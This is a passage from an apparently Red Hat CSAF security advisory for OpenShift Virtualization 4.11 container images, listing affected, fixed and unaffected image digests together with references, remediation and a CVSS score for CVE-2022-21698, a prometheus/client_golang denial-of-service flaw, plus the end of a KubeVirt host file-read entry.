"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, { cve: "CVE-2022-21698", cwe: { id: "CWE-772", name: "Missing Release of Resource after Effective Lifetime", }, discovery_date: "2022-01-19T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2045880", }, ], notes: [ { category: "description", text: "A denial of service attack was found in prometheus/client_golang. This flaw allows an attacker to produce a denial of service attack on an HTTP server by exploiting the InstrumentHandlerCounter function in the version below 1.11.1, resulting in a loss of availability.", title: "Vulnerability description", }, { category: "summary", text: "prometheus/client_golang: Denial of service using InstrumentHandlerCounter", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as having a moderate impact for two main reasons. The opportunity for a Denial of Service is limited to the golang runtime. In the case of OpenShift Container Platform, this would be restricted within each individual container. Additionally, this is in alignment with upstream's (the Prometheus project) impact rating.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-21698", }, { category: "external", summary: "RHBZ#2045880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2045880", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-21698", url: "https://www.cve.org/CVERecord?id=CVE-2022-21698", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", }, { category: "external", summary: "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", url: "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", }, ], release_date: "2022-02-15T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", 